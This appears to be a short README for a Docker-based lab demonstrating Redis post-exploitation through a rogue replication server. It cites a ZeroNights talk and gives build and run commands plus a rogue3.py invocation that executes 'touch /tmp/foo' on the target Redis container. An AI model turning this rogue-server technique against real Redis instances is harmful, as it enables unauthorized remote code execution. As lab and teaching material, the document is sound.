redis-post-exploitation
For educational purposes only
Reference
- https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf
- https://paper.seebug.org/975/
Rogue Server
Build
$ docker-compose build
Run
$ docker-compose up -d
$ docker-compose exec rogue sh
/rogue/redis-rogue-server # python3 rogue3.py --rhost redis --rport 6379 --lhost rogue --lport 21000
...
[<<] touch /tmp/foo
Check
$ docker-compose exec redis sh
/data # ls /tmp/
foo